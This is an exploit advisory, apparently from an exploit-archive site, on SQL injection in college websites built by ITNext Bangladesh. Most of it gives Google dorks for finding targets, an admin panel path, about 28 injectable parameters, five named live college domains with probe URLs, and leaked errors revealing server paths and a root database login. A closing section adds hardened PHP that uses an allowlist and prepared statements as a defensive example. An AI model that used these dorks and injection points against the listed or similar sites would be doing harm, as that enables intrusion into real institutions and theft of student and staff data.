###################################################################
# Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : itnext.com.bd ~ edu-bd.org
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''This is Web-App Not Only A Website!!! Powered By ITNext>>'' site:edu.bd
intext:''Powered By ITNext>>'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html
# CXSecurity Exploit Reference Link :
cxsecurity.com/issue/WLB-2019010042
###################################################################
# Admin Panel Login Path :
*************************
/index.php?cat=quicklink&del=login
# SQL Injection Exploits :
***********************
/admission/index.php?cat=[SQL Injection]
/index.php?cat=quicklink&del=[SQL Injection]
/index.php?cat=Home&del=[SQL Injection]
/index.php?cat=Principal&del=[SQL Injection]
/index.php?cat=Vice%20Principal&del=[SQL Injection]
/index.php?cat=Teachers&del=[SQL Injection]
/index.php?cat=Students&del=[SQL Injection]
/index.php?cat=Brief%20History&del=[SQL Injection]
/index.php?cat=Tuition%20Fees&del=[SQL Injection]
/index.php?cat=Attendence&del=[SQL Injection]
/index.php?cat=List%20of%20Holiday&del=[SQL Injection]
/index.php?cat=Class%20Schedule&del=[SQL Injection]
/index.php?cat=Academic%20Calander&del=[SQL Injection]
/index.php?cat=Admission%20Fees&del=[SQL Injection]
/index.php?cat=Admission%20Open&del=[SQL Injection]
/index.php?cat=Laboratory&del=[SQL Injection]
/index.php?cat=Computer%20Lab&del=[SQL Injection]
/index.php?cat=College%20Library&del=[SQL Injection]
/index.php?cat=ACADEMIC&del=[SQL Injection]
/index.php?cat=ADMISSION&del=[SQL Injection]
/index.php?cat=Check%20Dues&del=[SQL Injection]
/index.php?cat=Online%20Payments&del=[SQL Injection]
/index.php?cat=News%20Corner&del=[SQL Injection]
/index.php?cat=Notice%20Board&del=[SQL Injection]
/index.php?cat=Photo%20Gallery&del=[SQL Injection]
/index.php?cat=Email%20Us&del=[SQL Injection]
/index.php?cat=Find%20Us&del=[SQL Injection]
###################################################################
# Example Vulnerable Sites =>
***************************
Note => (107.155.116.175) => There are 14 domains hosted on this server.
[+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27
=> [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT
[+] ramucollege.edu.bd/admission/index.php?cat=1'
[+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27
[+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27
[+] cgc.edu.bd/index.php?cat=quicklink&del=1%27
###################################################################
# SQL Database Error :
*********************
Warning: include(pages/1'.php): failed to open stream: No such file or directory in /home/mcollege/public_html/index.php on line 426
Warning: include(): Failed opening 'pages/1'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426
Warning: mysql_connect(): Access denied for user 'root'@'localhost' (using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################
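As an added example (not code from the advisory or from ITNext), the following PHP shows a hardened handler for the `cat` and `del` parameters the advisory lists. The include() warnings above show `cat` being used to build a file path and the mysql_connect() warning shows a direct MySQL connection as root, so the commented "before" lines are an assumption reconstructed from those messages; the allowlist, DSN, credentials, table and column names are placeholders.

```php
<?php
// Added example, not ITNext's code. The "before" lines are an assumption
// reconstructed from the warnings in the advisory: `cat` reaches include()
// and the app talks to MySQL through mysql_connect().

// --- Assumed vulnerable shape, kept only for contrast --------------------
// include("pages/" . $_GET['cat'] . ".php");                   // user input builds a path
// mysql_query("SELECT * FROM items WHERE id=" . $_GET['del']); // user input builds SQL

// --- Hardened handler ----------------------------------------------------
ini_set('display_errors', '0');   // PHP warnings (paths, include_path) must not reach the client
ini_set('log_errors', '1');       // keep them in the server log for the operator

// 1. `cat` selects a page. Map it through a fixed allowlist of the names the
//    site actually serves; the raw string never touches the filesystem.
$pages = [
    'Home'      => 'home.php',
    'Principal' => 'principal.php',
    'Teachers'  => 'teachers.php',
    'Students'  => 'students.php',
    'quicklink' => 'quicklink.php',
];
$cat = $_GET['cat'] ?? 'Home';
if (!array_key_exists($cat, $pages)) {
    http_response_code(404);
    exit('Page not found');
}

// 2. `del` is a record id. Enforce the type, then bind it as a parameter so
//    the database never parses it as SQL (a `1'` probe now gets a 400, not an error page).
if (!isset($_GET['del']) || !ctype_digit($_GET['del'])) {
    http_response_code(400);
    exit('Invalid request');
}
$del = (int) $_GET['del'];

// Placeholder DSN, credentials, table and columns; use a least-privilege
// account, not root as in the advisory's mysql_connect() warning.
$pdo = new PDO('mysql:host=localhost;dbname=college', 'app_user', 'PLACEHOLDER', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);
$stmt = $pdo->prepare('SELECT id, title, body FROM pages WHERE id = ?');
$stmt->execute([$del]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

require __DIR__ . '/pages/' . $pages[$cat];   // $row is available to the included page
```

The allowlist also removes the path-building that produced the include() warnings, so both the injection and the error-page information leak in the advisory are closed by the same handler.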